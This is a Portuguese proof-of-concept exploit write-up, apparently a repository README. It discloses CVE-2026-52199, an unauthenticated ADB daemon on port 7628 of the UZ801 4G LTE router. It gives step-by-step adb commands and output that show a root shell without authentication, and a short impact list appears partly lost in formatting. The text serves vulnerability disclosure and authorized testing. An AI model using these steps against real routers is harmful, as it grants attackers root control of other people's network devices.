
Exploit de prova de conceito para CVE-2026-52199: execução remota de código não autenticada através do daemon ADB exposto no roteador UZ801 4G LTE. Inclui análise de vulnerabilidade, avaliação de impacto e guia de exploração passo a passo para testes de segurança autorizados.
Existe uma vulnerabilidade crítica de Controle de Acesso Incorreto no Roteador 4G LTE Generic OEM UZ801_v2.1 (Firmware V3.4.3). O dispositivo expõe indevidamente um daemon Android Debug Bridge (ADB) não autenticado (/sbin/adbd) na porta TCP 7628 para a rede adjacente (LAN/WiFi).
Um atacante conectado à rede local do dispositivo pode explorar essa falha para contornar todos os mecanismos de autenticação, estabelecer uma conexão ADB e executar código arbitrário com privilégios root.

/sbin/adbdA exploração desta vulnerabilidade leva a um comprometimento completo do sistema. O impacto inclui:
root)O processo de exploração não requer ferramentas especiais além do cliente adb padrão e acesso à rede adjacente.
Passo 1: Conecte-se à rede WiFi do roteador UZ801 (o Gateway padrão geralmente é 192.168.100.1).
Passo 2: Escaneie o dispositivo em busca de portas abertas. A porta 7628/TCP será reportada como aberta.
Passo 3: A partir da máquina do atacante, inicie uma conexão ADB para a porta não documentada:
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628
Passo 4: Solicite um shell interativo:
$ adb -s 192.168.100.1:7628 shell
Passo 5: O atacante é imediatamente colocado em um shell root sem nenhum prompt de autenticação:
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64
Apenas para Fins Educacionais e de Pesquisa de Segurança Autorizada.
As informações e a prova de conceito fornecidas neste repositório destinam-se exclusivamente a fins educacionais e para ajudar a proteger redes. O autor (lamaper) não é responsável por qualquer uso indevido dessas informações. Não use este exploit contra dispositivos ou redes que você não possui ou para os quais não tem permissão explícita para testar.